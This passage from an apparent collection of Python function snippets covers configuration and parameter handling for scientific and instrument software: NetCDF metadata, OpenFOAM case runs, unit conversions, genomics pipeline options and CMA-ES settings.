model \"\n \"described in Uliasz 1994.\")\n ds.Conventions = \"CF-1.6 ACDD-1.3\"\n ds.history = (\"{date:{acdd_format}} {user:s} \"\n \"created by {progname:s}\").format(\n date=RUN_DATE, user=os.environ[\"USER\"],\n acdd_format=ACDD_DATE,\n progname=sys.argv[0])\n ds.source = (\"Gridded outputs from LPDM v?.?.? \"\n \"written by Uliasz et al. and modified by Lauvaux\")\n ds.standard_name_vocabulary = \"CF Standard Name Table v32\"\n ds.date_created = \"{date:{acdd_format}}\".format(\n date=RUN_DATE, acdd_format=ACDD_DATE)\n ds.creator_name = \"Daniel Wesloh, Thomas Lauvaux\"\n ds.creator_institution = (\n \"The Pennsylvania State University \"\n \"Department of Meteorology and Atmospheric Science\")\n ds.date_modified = \"{date:{acdd_format}}\".format(\n date=RUN_DATE, acdd_format=ACDD_DATE)\n ds.date_metadata_modified = \"{date:{acdd_format}}\".format(\n date=RUN_DATE, acdd_format=ACDD_DATE)\n ds.product_version = \"Py_v1.0.0\"\n ds.references = \"\"\"Uliasz, M. 1994. Lagrangian particle dispersion modeling in mesoscale applications. 
Environ Model: Comput Methods and Softw for Simulat Environ Pollut and its Adverse Effects (CMP) 2 : 71-.\"\"\"\n\n ds.geospatial_vertical_min = 0\n ds.geospatial_vertical_max = CLOSE_TO_GROUND\n ds.geospatial_vertical_positive = \"up\"\n ds.geospatial_vertical_units = \"km AGL\"\n # Kind of a cross between Grid and Trajectory\n # Grid covers the first and last two axes;\n # trajectory covers third-to-last\n ds.cdm_data_type = \"Grid\"\n\n ds.institution = ds.creator_institution", "def updateData(self, *args):\n # if self.move_next_option == \"R\":\n # self.restSampling()\n # elif self.move_next_option == \"A\":\n # self.addExtra()\n # else:\n # self.continueReview()\n for name, value in self.parameter_inputs.items():\n self.parameters[name] = value.value\n # directly change the value of class variables\n logMsg((\"update settings: \", self.ml_classifier_cls, name, value.value))\n setattr(self.ml_classifier_cls, name, value.value)\n\n pass", "def option_check_and_set(args, params):\n# Error out if initial sequence files are missing and merging is seleceted. \n\n# Set OTU clustering criteria:\n if (args.filter or args.table_workflow):\n if params['id_thresh'] is None:\n params['id_thresh'] = input('[Cluster] Enter OTU clustering threshold (default = 0.97): ')\n \n if params['max_ee_rate'] is None:\n params['max_ee_rate'] = input('[Filter] Max Errors (~.5-1 per 100bp or 1-3 per 250bp): ')\n \n if params['min_len'] is None:\n params['min_len']= input('[Cutadapt] Enter minimum sequence length: ')\n \n if params['max_len'] is None:\n params['max_len']= input('[Cutadapt] Enter maximum sequence length: ')\n\n\n if args.cluster:\n if params['id_thresh'] is None:\n params['id_thresh'] = input('[Cluster] Enter OTU clustering threshold (default = 0.97): ')\n \n\n\n# Set cutadapt options:\n if (args.cutadapt):\n if params['fwd_primer'] is None:\n params['fwd_primer'] = input('[Cutadapt] Enter forward primer: ')\n \n if params['rev_primer'] is None:\n params['rev_primer'] = input('[Cutadapt] Enter reverse primer: ')\n \n return params", "def config( **kwargs ):", "def do_project_update(cs, args):\n raise NotImplementedError", "def _ApplyFlags(cls, config_values, flag_values):\n super()._ApplyFlags(config_values, flag_values)\n if flag_values['cloud_spanner_config'].present:\n config_values['config'] = flag_values.cloud_spanner_config\n if flag_values['cloud_spanner_nodes'].present:\n config_values['nodes'] = flag_values.cloud_spanner_nodes\n if flag_values['cloud_spanner_project'].present:\n config_values['project'] = flag_values.cloud_spanner_project", "def define_parameters(self):\n self.add_argument('--prefix', dest='prefix', type=str, optional=False,\n help='prefix for file names')\n self.add_argument('--sleepLength',\n dest = 'sleepLength',\n type = str,\n optional = True,\n help ='time to sleep before performing plugin action',\n default = '0')", "def do_config(self, args):\n self.config_command.cmdloop(\"Enter to config mode\")", "def setGravity(*argv):", "def runCase(foamCase, baseCase, parameters, volumeParameters, controlParameters, options=dict(parallel=False, overwrite=True)):\n print('\\n==============================================================\\nRunning ' + foamCase + '\\n==============================================================\\n')\n \n status = checkIfExist(foamCase)\n if status != 2:\n print(foamCase + ' already exists. Continue with next case ...' 
)\n if status ==1:\n return 2 # for when the case is still running \n else:\n return 1 # for when the case has finished running\n else:\n createCase(foamCase, baseCase)\n # get old parameters. \n parameterFile = 'parameters'\n #for parameter in parameters.keys():\n # currentValue = readInput(parameterFile, parameter, foamCase)\n # parameters[parameter]=currentValue\n\n # Values to be changed\n print('\\n\\nChanging section\\n\\n\\t\\tGeometry') \n for parameter in parameters.keys():\n changeInput(parameter, parameters[parameter], parameterFile, foamCase)\n\n print('\\n\\t\\tVolumetric flow parameters')\n for volumeParameter in volumeParameters.keys():\n writeParameter = volumeParameter.replace('Q', 'U')\n if volumeParameter=='QNozzleIn':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], angle = 5)\n elif volumeParameter=='QShieldIn':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2])\n elif volumeParameter=='QShieldOut':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], direction=[0, 1, 0])\n print(velocity)\n changeInput(volumeParameter, volumeParameters[volumeParameter][0], parameterFile, foamCase) # for visual interpretation in parameters file\n changeInput(writeParameter, velocity, 'U', foamCase) # for the inflow condition\n \n print('\\n\\t\\tControl parameters ')\n for controlParameter in controlParameters.keys():\n changeInput(controlParameter, controlParameters[controlParameter], 'controlDict', foamCase)\n \n\n print('\\n\\t\\tRunning section')\n #steps \n steps =[\n 'blockMesh',\n 'extrudeMesh',\n 'changeDictionary',\n 'createPatch',\n 'renumberMesh',\n 'checkMesh',\n 'prepare',\n 'run',\n ]\n \n checkResult = checkDicts(steps, foamCase=foamCase)\n if checkResult==1:\n print('\\n\\t\\tContinue to the next case... \\n')\n return 2\n else:\n runFile = foamCase + '/Allrun.sh'\n createOptimizeRunFile(runFile, steps, options, parameters)\n print('\\t\\tRunning....')\n os.system(runFile) # actually run the file\n print('\\t\\tFinished run....')\n return 0", "def _update_params(self, *args, **kwargs):\n\n \n # Get old param dict config.\n old_config = self._param_dict.get_config()\n \n # Issue display commands and parse results.\n timeout = kwargs.get('timeout', SBE37_TIMEOUT)\n self._do_cmd_resp('ds',timeout=timeout)\n self._do_cmd_resp('dc',timeout=timeout)\n \n # Get new param dict config. 
If it differs from the old config,\n # tell driver superclass to publish a config change event.\n new_config = self._param_dict.get_config()\n if new_config != old_config:\n self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)", "def SetChassisMode(self, *args, **kwargs):\n payload = {}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 1)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"setChassisMode\", payload=payload, response_object=None)", "def _two_arg_settings(self, args, invalids, master):\n \n for arg in args:\n if arg[0] not in invalids:\n master[arg[0]] = arg[1]", "def __init__(self, *args, **kwargs):\n self._rcParams = {}\n self.update(*args, **kwargs)", "def _set_function_parameters(self, p_args=None) -> bool:\n if self.get_type() == self.C_UNIT_CONV_LENGTH:\n self.units = {\n 'fm' : 1000000000000000,\n 'pm' : 1000000000000,\n 'nm' : 1000000000,\n 'um' : 1000000,\n 'mm' : 1000,\n 'cm' : 100,\n 'm' : 1.0,\n 'dam' : 0.1,\n 'hm' : 0.01,\n 'km' : 0.001,\n 'Mm' : 0.000001,\n 'Gm' : 0.000000001,\n 'Tm' : 0.000000000001,\n 'Pm' : 0.000000000000001,\n 'inch' : 39.3701,\n 'ft' : 3.28084,\n 'yd' : 1.09361,\n 'mi' : 0.000621371,\n 'nautMi' : 1.0/1852.0,\n 'lightYear' : 1.0/(9.4607304725808*(10**15))\n }\n \n elif self.get_type() == self.C_UNIT_CONV_PRESSURE:\n self.units = {\n 'Pa' : 100000.0,\n 'hPa' : 1000.0,\n 'kPa' : 100.0,\n 'MPa' : 0.1,\n 'bar' : 1.0,\n 'mbar' : 1000.0,\n 'ubar' : 1000000.0,\n 'kgcm2' : 1.01972,\n 'atm' : 0.986923,\n 'mmHg' : 750.062,\n 'mmH2O' : 10197.162129779,\n 'mH2O' : 10.197162129779,\n 'ftH2O' : 33.455256555148,\n 'inH2O' : 401.865,\n 'inHg' : 29.53,\n 'psi' : 14.5038\n }\n \n elif self.get_type() == self.C_UNIT_CONV_CURRENT:\n self.units = {\n 'fA' : 1000000000000000,\n 'pA' : 1000000000000,\n 'nA' : 1000000000,\n 'uA' : 1000000,\n 'mA' : 1000,\n 'cA' : 100,\n 'A' : 1.0,\n 'daA' : 0.1,\n 'hA' : 0.01,\n 'kA' : 0.001,\n 'MA' : 0.000001,\n 'GA' : 0.000000001,\n 'TA' : 0.000000000001,\n 'PA' : 0.000000000000001,\n }\n \n elif self.get_type() == self.C_UNIT_CONV_FORCE:\n self.units = {\n 'fN' : 1000000000000000,\n 'pN' : 1000000000000,\n 'nN' : 1000000000,\n 'uN' : 1000000,\n 'mN' : 1000,\n 'cN' : 100,\n 'N' : 1.0,\n 'daN' : 0.1,\n 'hN' : 0.01,\n 'kN' : 0.001,\n 'MN' : 0.000001,\n 'GN' : 0.000000001,\n 'TN' : 0.000000000001,\n 'PN' : 0.000000000000001,\n 'shortTonF' : 1.124045e-4,\n 'longTonF' : 1.003611e-4,\n 'kipf' : 2.248089e-4,\n 'lbf' : 2.248089431e-1,\n 'ozf' : 3.5969430896,\n 'pdf' : 7.2330138512,\n 'gf' : 1.019716213e+2,\n 'kgf' : 1.019716213e-1,\n 'dyn' : 1e+5,\n 'J/m' : 1.0,\n 'J/cm' : 100.0\n }\n \n elif self.get_type() == self.C_UNIT_CONV_POWER:\n self.units = {\n 'fW' : 1000000000000000*1e3,\n 'pW' : 1000000000000*1e3,\n 'nW' : 1000000000*1e3,\n 'uW' : 1000000*1e3,\n 'mW' : 1000*1e3,\n 'cW' : 100*1e3,\n 'W' : 1.0*1e3,\n 'daW' : 0.1*1e3,\n 'hW' : 0.01*1e3,\n 'kW' : 0.001*1e3,\n 'MW' : 0.000001*1e3,\n 'GW' : 0.000000001*1e3,\n 'TW' : 0.000000000001*1e3,\n 'PW' : 0.000000000000001*1e3,\n 'BTU/hr' : 3412.14,\n 'BTU/min' : 56.869,\n 'BTU/sec' : 0.94781666666,\n 'cal/sec' : 238.85,\n 'cal/min' : 238.85*60,\n 'cal/hr' : 238.85*60*60,\n 'erg/sec' : 10e9,\n 'erg/min' : 10e9*60,\n 'erg/hr' : 10e9*60*60,\n 'ftlb/sec' : 737.56,\n 'kCal/sec' : 0.24,\n 'kCal/min' : 0.24*60,\n 'kCal/hr' : 0.24*60*60,\n 'VA' : 1e3,\n 'metric_ton_ref' : 0.259,\n 'US_ton_ref' : 0.2843451361,\n 'J/sec' : 1000.0,\n 'J/min' : 1000.0*60,\n 'J/hr' : 1000.0*60*60,\n 'kgf-m/sec' : 101.97162129779,\n 'hp_mech' : 1.3410220888,\n 'hp_ele' : 
1.3404825737,\n 'hp_metric' : 1.359621617304\n }\n \n elif self.get_type() == self.C_UNIT_CONV_MASS:\n self.units = {\n 'fg' : 1000000000000000*1e3,\n 'pg' : 1000000000000*1e3,\n 'ng' : 1000000000*1e3,\n 'ug' : 1000000*1e3,\n 'mg' : 1000*1e3,\n 'cg' : 100*1e3,\n 'g' : 1.0*1e3,\n 'dag' : 0.1*1e3,\n 'hg' : 0.01*1e3,\n 'kg' : 0.001*1e3,\n 'Mg' : 0.000001*1e3,\n 'Gg' : 0.000000001*1e3,\n 'Tg' : 0.000000000001*1e3,\n 'Pg' : 0.000000000000001*1e3,\n 'metricTon' : 1.0/1000.0,\n 'shortTon' : 1.0/907.185,\n 'longTon' : 1.0/1016.047,\n 'slug' : 1.0/14.5939029,\n 'lb' : 2.2046226218,\n 'oz' : 35.274,\n 'grain' : 2.2046226218*7000.0\n }\n \n elif self.get_type() == self.C_UNIT_CONV_TIME:\n self.units = {\n 'fs' : 1000000000000000,\n 'ps' : 1000000000000,\n 'ns' : 1000000000,\n 'us' : 1000000,\n 'ms' : 1000,\n 'cs' : 100,\n 's' : 1.0,\n 'das' : 0.1,\n 'hs' : 0.01,\n 'ks' : 0.001,\n 'Ms' : 0.000001,\n 'Gs' : 0.000000001,\n 'Ts' : 0.000000000001,\n 'Ps' : 0.000000000000001,\n 'min' : 1.0/60.0,\n 'hr' : 1.0/60.0/60.0,\n 'day' : 1.0/60.0/60.0/24.0\n }\n \n elif self.get_type() == self.C_UNIT_CONV_TEMPERATURE:\n self.units = {\n 'K' : 'Kelvin',\n 'R' : 'Rankine',\n 'F' : 'Fahrenheit',\n 'C' : 'Celcius',\n }\n \n if self.units.get(self._unit_in) is not None and self.units.get(self._unit_out) is not None:\n return True\n else:\n raise NotImplementedError('The input and/or output units do not exist!')", "def updateParameters(self, parameters):", "def _handle_common_options(ctx, conpath=None, force=None, species=None):\n\n config = configuration.Config()\n\n ## Update the config or look in places where it may exist\n if conpath:\n config.reload(conpath)\n\n if force is not None:\n config.config['overwrite'] = force\n\n if species is not None:\n config.config['species'] = species\n\n ctx.ensure_object(dict)\n ctx.obj['config'] = config\n\n return ctx", "def update(self, args):\n pass", "def setAttributesFromCmdLine(self):\n try:\n opts, args = getopt.getopt(sys.argv[1:],\n \"hVv:i:\",\n [\"help\", \"version\", \"verbose=\",\n \"proj1=\",\n \"proj2=\",\n \"step=\",\n \"samples=\",\n \"fcln=\",\n \"dict=\",\n \"schdlr=\",\n \"queue=\",\n \"enz=\",\n \"dmxmet=\",\n \"subst=\",\n \"ensubst=\",\n \"adp=\",\n \"errtol=\",\n \"minovl=\",\n \"minrl=\",\n \"minq=\",\n \"maxNp=\",\n \"ref=\",\n \"jgid=\",\n \"rat=\",\n \"mdp=\",\n \"mgq=\",\n \"mnfg=\",\n \"mffg=\",\n \"mnnc=\",\n \"mfnc=\",\n \"fam=\",\n \"mvq=\",\n \"xlssf=\",\n \"tmpd=\",\n \"jvmXms=\",\n \"jvmXmx=\",\n \"queue2=\",\n \"knowni=\",\n \"known=\",\n \"force\",\n \"pird=\",\n \"resou=\",\n \"rmvb\"])\n except getopt.GetoptError as err:\n sys.stderr.write(\"%s\\n\\n\" % str(err))\n # self.help()\n sys.exit(2)\n for o, a in opts:\n if o == \"-h\" or o == \"--help\":\n self.help()\n sys.exit(0)\n elif o == \"-V\" or o == \"--version\":\n self.version()\n sys.exit(0)\n elif o == \"-v\" or o == \"--verbose\":\n self.verbose = int(a)\n elif o == \"--proj1\":\n self.project1Id = a\n elif o == \"--proj2\":\n self.project2Id = a\n elif o == \"--schdlr\":\n self.scheduler = a\n elif o == \"--queue\":\n self.queue = a\n elif o == \"--resou\":\n self.lResources = a.split()\n elif o == \"--rmvb\":\n self.rmvBash = True\n elif o == \"--step\":\n self.lSteps = [a]\n elif o == \"--samples\":\n self.samplesFile = a\n elif o == \"--fcln\":\n self.fclnToKeep = a\n elif o == \"--pird\":\n self.pathToInReadsDir = a\n elif o == \"--enz\":\n self.enzyme = a\n elif o == \"--dmxmet\":\n self.dmxMethod = a\n elif o == \"--subst\":\n self.nbSubstsAllowedDemult = int(a)\n elif o == 
\"--ensubst\":\n self.enforceSubst = a\n elif o == \"--adp\":\n self.adpFile = a\n elif o == \"--errtol\":\n self.errTol = float(a)\n elif o == \"--minovl\":\n self.minOvl = int(a)\n elif o == \"--minrl\":\n self.minReadLen = int(a)\n elif o == \"--minq\":\n self.minQual = int(a)\n elif o == \"--maxNp\":\n self.maxNPerc = float(a)\n elif o == \"--ref\":\n self.pathToPrefixRefGenome = a\n elif o == \"--dict\":\n self.dictFile = a\n elif o == \"--jgid\":\n self.jointGenoId = a\n elif o == \"--rat\":\n self.restrictAllelesTo = a\n elif o == \"--mdp\":\n self.minDp = int(a)\n elif o == \"--mgq\":\n self.minGq = int(a)\n elif o == \"--mnfg\":\n self.maxNbFilterGenos = int(a)\n elif o == \"--mffg\":\n self.maxFracFilterGenos = float(a)\n elif o == \"--mnnc\":\n self.maxNbNocallGenos = int(a)\n elif o == \"--mfnc\":\n self.maxFracNocallGenos = float(a)\n elif o == \"--fam\":\n self.famFile = a\n elif o == \"--mvq\":\n self.mendelianViolationQualThreshold = int(a)\n elif o == \"--xlssf\":\n self.excludeSampleFile = a\n elif o == \"--tmpd\":\n self.tmpDir = a\n elif o == \"--jvmXms\":\n self.jvmXms = a\n elif o == \"--jvmXmx\":\n self.jvmXmx = a\n elif o == \"--queue2\":\n self.queue2 = a\n elif o == \"--knowni\":\n self.knownIndelsFile = a\n elif o == \"--known\":\n self.knownFile = a\n elif o == \"--force\":\n self.forceRerunSteps = True\n else:\n assert False, \"invalid option\"", "def do_it(args):\n\n #force = args.force\n #testing = args.testing\n #verbose = args.verbose\n #regions = args.regions\n\n # XXX WORKING HERE", "def setOptions(args):\n obs_dir = PATH_TO_OBS + args.loc[0] + '/Drifter/'\n\n if args.debug:\n print 'looking for drifter directory...'\n\n if not osp.exists(obs_dir) or not osp.isdir(obs_dir):\n sys.exit('drifter directory not found.')\n elif args.debug:\n print 'drifter directory successfully found.'\n print '\\tgathering all files...'\n\n matfiles = [obs_dir + file for file in os.listdir(obs_dir)]\n if len(matfiles) == 0:\n sys.exit('no files found in drifter directory.')\n elif args.debug:\n print '\\tall drifter files found.'\n\n if args.debug:\n print 'looking for fvcom directory(s)...'\n\n if args.bfric:\n path2sim = PATH_TO_SIM + 'BFRIC_' + args.bfric + '/'\n\n # locate given fvcom file\n if args.dir:\n sim_path = [path2sim + args.loc[0] + '/' + args.dir[0]]\n if not osp.exists(sim_path[0]) or not osp.isdir(sim_path[0]):\n sys.exit('the directory {} could not be located.'.format(sim_path))\n elif args.debug:\n print '\\tfvcom directory found. 
\\n\\tloading nc file...'\n\n sim_path[0] = sim_path[0]+'/output/subdomain_'+args.loc[0]+'1_0001.nc'\n if not osp.exists(sim_path[0]) or not osp.isfile(sim_path[0]):\n sys.exit('fvcom file not in directory.')\n elif args.debug:\n print '\\tfvcom file successfully located.'\n else:\n dirs = os.listdir(path2sim + args.loc[0] + '/')\n sim_path = [path2sim + args.loc[0] + '/' + file + \\\n '/output/subdomain_' + args.loc[0] + '1_0001.nc' for file in dirs]\n\n for path in sim_path:\n if not osp.exists(path) or not osp.isfile(path):\n sys.exit('fvcom file {} is not found.'.format(path))\n sim_path.remove(path)\n\n if len(sim_path) == 0:\n sys.exit('no ncfiles found in directory.')\n elif args.debug:\n print '\\tall ncdirectories found.'\n\n return args.loc[0], sim_path, obs_dir, matfiles", "def updateParameters(self, parameters):\n if parameters[0].value and parameters[3].value:\n if (parameters[0].altered or paramaters[3].altered) and not parameters[4].altered:\n layer = parameters[0].valueAsText;\n desc = arcpy.Describe(layer)\n name = desc.file;\n type = parameters[3].valueAsText;\n char = type[:1];\n if (char != 'U'):\n if (char != 'C'):\n char = 'C' + char; #Output _C + first letter of type unless it is U\n else:\n char = 'CT'; # Unless it is C, then it is CT... \n #Update name accordingly\n resulttmp = \"%WORKSPACE%\\\\\" + name + \"_\" + char; \n parameters[4].value = resulttmp.replace(\".\",\"\"); #Remove illegal characters\n return", "def setCSEParameters(csi:str, ri:str, rn:str) -> None:\n\t\t\tCSE.cseCsi = csi\n\t\t\tConfiguration.set('cse.csi', csi)\n\t\t\tCSE.cseRi = ri\n\t\t\tConfiguration.set('cse.ri', ri)\n\t\t\tCSE.cseRn = rn\n\t\t\tConfiguration.set('cse.rn', rn)", "def set_params(self, *arg):\n pass", "def do(self, argin):\n component_manager = self.target\n component_manager.configure(argin)\n return (ResultCode.OK, \"Configure command completed OK\")", "def change(self, ids, **kwargs):\n args = {}\n for key, value in kwargs.iteritems():\n argument = make_rpc_name(key)\n (arg, val) = argument_value_convert('torrent-set'\n , argument, value, self.rpc_version)\n args[arg] = val\n\n if len(args) > 0:\n self._request('torrent-set', args, ids, True)\n else:\n ValueError(\"No arguments to set\")", "def update(*args):", "def set_readonly_values(self, *args, **kwargs):\n # Let's give it a try in unknown state\n if (self.get_current_state() != ProtocolState.COMMAND):\n raise InstrumentProtocolException(\"Not in command state. 
Unable to set read-only params\")\n\n self._go_to_root_menu()\n self._update_params()\n\n for param in self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY):\n if not Parameter.has(param):\n raise InstrumentParameterException()\n\n self._go_to_root_menu()\n # Only try to change them if they arent set right as it is\n log.trace(\"Setting read-only parameter: %s, current paramdict value: %s, init val: %s\",\n param, self._param_dict.get(param),\n self._param_dict.get_init_value(param))\n if (self._param_dict.get(param) != self._param_dict.get_init_value(param)):\n if (param == Parameter.METADATA_POWERUP):\n self._navigate(SubMenu.METADATA_POWERUP)\n result = self._do_cmd_resp(Command.DIRECT_SET, (1+ int(self._param_dict.get_init_value(param))),\n expected_prompt=Prompt.CHANGE_PARAM_MENU)\n if not result:\n raise InstrumentParameterException(\"Could not set param %s\" % param)\n \n self._go_to_root_menu() \n \n elif (param == Parameter.METADATA_RESTART):\n self._navigate(SubMenu.METADATA_RESTART)\n result = self._do_cmd_resp(Command.DIRECT_SET, (1 + int(self._param_dict.get_init_value(param))),\n expected_prompt=Prompt.CHANGE_PARAM_MENU)\n if not result:\n raise InstrumentParameterException(\"Could not set param %s\" % param)\n \n self._go_to_root_menu()\n \n elif (param == Parameter.VERBOSE):\n self._navigate(SubMenu.VERBOSE)\n result = self._do_cmd_resp(Command.DIRECT_SET, self._param_dict.get_init_value(param),\n expected_prompt=Prompt.CHANGE_PARAM_MENU)\n if not result:\n raise InstrumentParameterException(\"Could not set param %s\" % param)\n \n self._go_to_root_menu() \n \n elif (param == Parameter.EH_ISOLATION_AMP_POWER):\n result = self._navigate(SubMenu.EH_ISOLATION_AMP_POWER)\n while not result:\n result = self._navigate(SubMenu.EH_ISOLATION_AMP_POWER)\n \n elif (param == Parameter.HYDROGEN_POWER):\n result = self._navigate(SubMenu.HYDROGEN_POWER)\n while not result:\n result = self._navigate(SubMenu.HYDROGEN_POWER)\n \n elif (param == Parameter.INST_AMP_POWER):\n result = self._navigate(SubMenu.INST_AMP_POWER)\n while not result:\n result = self._navigate(SubMenu.INST_AMP_POWER)\n \n elif (param == Parameter.REFERENCE_TEMP_POWER):\n result = self._navigate(SubMenu.REFERENCE_TEMP_POWER)\n while not result:\n result = self._navigate(SubMenu.REFERENCE_TEMP_POWER)\n \n elif (param == Parameter.RES_SENSOR_POWER):\n result = self._navigate(SubMenu.RES_SENSOR_POWER)\n while not result:\n result = self._navigate(SubMenu.RES_SENSOR_POWER)\n \n # re-sync with param dict?\n self._go_to_root_menu()\n self._update_params()\n \n # Should be good by now, but let's double check just to be safe\n for param in self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY):\n if (param == Parameter.VERBOSE):\n continue\n if (self._param_dict.get(param) != self._param_dict.get_init_value(param)):\n raise InstrumentProtocolException(\"Could not set default values!\")", "def setParameters(self, mu=1, k=10, c_a=1.1, c_r=0.5, epsilon=1e-20, **ukwargs):\n\t\tself.mu, self.k, self.c_a, self.c_r, self.epsilon = mu, k, c_a, c_r, epsilon\n\t\tif ukwargs: logger.info('Unused arguments: %s' % (ukwargs))", "def do_update(cs, args):\n opts = {}\n opts['memory'] = args.memory\n opts['cpu'] = args.cpu\n opts['name'] = args.name\n if 'auto_heal' in args and args.auto_heal:\n opts['auto_heal'] = True\n if 'no_auto_heal' in args and args.no_auto_heal:\n opts['auto_heal'] = False\n opts = zun_utils.remove_null_parms(**opts)\n if not opts:\n raise exc.CommandError(\"You must update at least one 
property\")\n container = cs.containers.update(args.container, **opts)\n _show_container(container)", "def _apply_params(self):\n config = self.get_startup_config()\n # Pass true to _set_params so we know these are startup values\n self._set_params(config, True)", "def set(self, opts, popsize=None, ccovfac=1, verbose=True):\r\n\r\n alpha_cc = 1.0 # cc-correction for mueff, was zero before\r\n\r\n def cone(df, mu, N, alphacov=2.0):\r\n \"\"\"rank one update learning rate, ``df`` is disregarded and obsolete, reduce alphacov on noisy problems, say to 0.5\"\"\"\r\n return alphacov / ((N + 1.3)**2 + mu)\r\n\r\n def cmu(df, mu, alphamu=0.0, alphacov=2.0):\r\n \"\"\"rank mu learning rate, disregarding the constrant cmu <= 1 - cone\"\"\"\r\n c = alphacov * (alphamu + mu - 2 + 1/mu) / ((N + 2)**2 + alphacov * mu / 2)\r\n # c = alphacov * (alphamu + mu - 2 + 1/mu) / (2 * (N + 2)**1.5 + alphacov * mu / 2)\r\n # print 'cmu =', c\r\n return c\r\n\r\n def conedf(df, mu, N):\r\n \"\"\"used for computing separable learning rate\"\"\"\r\n return 1. / (df + 2.*sqrt(df) + float(mu)/N)\r\n\r\n def cmudf(df, mu, alphamu):\r\n \"\"\"used for computing separable learning rate\"\"\"\r\n return (alphamu + mu - 2. + 1./mu) / (df + 4.*sqrt(df) + mu/2.)\r\n\r\n sp = self\r\n N = sp.N\r\n if popsize:\r\n opts.evalall({'N':N, 'popsize':popsize})\r\n else:\r\n popsize = opts.evalall({'N':N})['popsize'] # the default popsize is computed in Options()\r\n sp.popsize = popsize\r\n if opts['CMA_mirrors'] < 0.5:\r\n sp.lam_mirr = int(0.5 + opts['CMA_mirrors'] * popsize)\r\n elif opts['CMA_mirrors'] > 1:\r\n sp.lam_mirr = int(0.5 + opts['CMA_mirrors'])\r\n else:\r\n sp.lam_mirr = int(0.5 + 0.16 * min((popsize, 2 * N + 2)) + 0.29) # 0.158650... * popsize is optimal\r\n # lam = arange(2,22)\r\n # mirr = 0.16 + 0.29/lam\r\n # print(lam); print([int(0.5 + l) for l in mirr*lam])\r\n # [ 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21]\r\n # [1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 4]\r\n\r\n sp.mu_f = sp.popsize / 2.0 # float value of mu\r\n if opts['CMA_mu'] is not None:\r\n sp.mu_f = opts['CMA_mu']\r\n sp.mu = int(sp.mu_f + 0.499999) # round down for x.5\r\n # in principle we have mu_opt = popsize/2 + lam_mirr/2,\r\n # which means in particular weights should only be negative for q > 0.5+mirr_frac/2\r\n if sp.mu > sp.popsize - 2 * sp.lam_mirr + 1:\r\n print(\"WARNING: pairwise selection is not implemented, therefore \" +\r\n \" mu = %d > %d = %d - 2*%d + 1 = popsize - 2*mirr + 1 can produce a bias\" % (\r\n sp.mu, sp.popsize - 2 * sp.lam_mirr + 1, sp.popsize, sp.lam_mirr))\r\n if sp.lam_mirr > sp.popsize // 2:\r\n raise _Error(\"fraction of mirrors in the population as read from option CMA_mirrors cannot be larger 0.5, \" +\r\n \"theoretically optimal is 0.159\")\r\n sp.weights = log(max([sp.mu, sp.popsize / 2.0]) + 0.5) - log(1 + np.arange(sp.mu))\r\n if 11 < 3: # equal recombination weights\r\n sp.mu = sp.popsize // 4\r\n sp.weights = np.ones(sp.mu)\r\n print(sp.weights[:10])\r\n sp.weights /= sum(sp.weights)\r\n sp.mueff = 1 / sum(sp.weights**2)\r\n sp.cs = (sp.mueff + 2) / (N + sp.mueff + 3)\r\n # TODO: clean up (here the cumulation constant is shorter if sigma_vec is used)\r\n sp.dampsvec = opts['CMA_dampsvec_fac'] * (N + 2) if opts['CMA_dampsvec_fac'] else np.Inf\r\n sp.dampsvec_fading = opts['CMA_dampsvec_fade']\r\n if np.isfinite(sp.dampsvec):\r\n sp.cs = ((sp.mueff + 2) / (N + sp.mueff + 3))**0.5\r\n # sp.cs = (sp.mueff + 2) / (N + 1.5*sp.mueff + 1)\r\n sp.cc = (4 + alpha_cc * sp.mueff / N) / (N + 4 
+ alpha_cc * 2 * sp.mueff / N)\r\n sp.cc_sep = (1 + 1/N + alpha_cc * sp.mueff / N) / (N**0.5 + 1/N + alpha_cc * 2 * sp.mueff / N) # \\not\\gg\\cc\r\n sp.rankmualpha = opts['CMA_rankmualpha']\r\n # sp.rankmualpha = _evalOption(opts['CMA_rankmualpha'], 0.3)\r\n sp.c1 = ccovfac * min(1, sp.popsize/6) * cone((N**2 + N) / 2, sp.mueff, N) # 2. / ((N+1.3)**2 + sp.mucov)\r\n sp.c1_sep = ccovfac * conedf(N, sp.mueff, N)\r\n if 11 < 3:\r\n sp.c1 = 0.\r\n print('c1 is zero')\r\n if opts['CMA_rankmu'] != 0: # also empty\r\n sp.cmu = min(1 - sp.c1, ccovfac * cmu((N**2+N)/2, sp.mueff, sp.rankmualpha))\r\n sp.cmu_sep = min(1 - sp.c1_sep, ccovfac * cmudf(N, sp.mueff, sp.rankmualpha))\r\n else:\r\n sp.cmu = sp.cmu_sep = 0\r\n\r\n sp.neg = BlancClass()\r\n if opts['CMA_active']:\r\n # in principle we have mu_opt = popsize/2 + lam_mirr/2,\r\n # which means in particular weights should only be negative for q > 0.5+mirr_frac/2\r\n sp.neg.mu_f = popsize - (popsize + sp.lam_mirr) / 2 if popsize > 2 else 1\r\n sp.neg.weights = log(sp.mu_f + 0.5) - log(1 + np.arange(sp.popsize - int(sp.neg.mu_f), sp.popsize))\r\n sp.neg.mu = len(sp.neg.weights) # maybe never useful?\r\n sp.neg.weights /= sum(sp.neg.weights)\r\n sp.neg.mueff = 1 / sum(sp.neg.weights**2)\r\n sp.neg.cmuexp = opts['CMA_activefac'] * 0.25 * sp.neg.mueff / ((N+2)**1.5 + 2 * sp.neg.mueff)\r\n assert sp.neg.mu >= sp.lam_mirr # not really necessary\r\n # sp.neg.minresidualvariance = 0.66 # not it use, keep at least 0.66 in all directions, small popsize is most critical\r\n else:\r\n sp.neg.cmuexp = 0\r\n\r\n sp.CMA_on = sp.c1 + sp.cmu > 0\r\n # print(sp.c1_sep / sp.cc_sep)\r\n\r\n if not opts['CMA_on'] and opts['CMA_on'] not in (None,[],(),''):\r\n sp.CMA_on = False\r\n # sp.c1 = sp.cmu 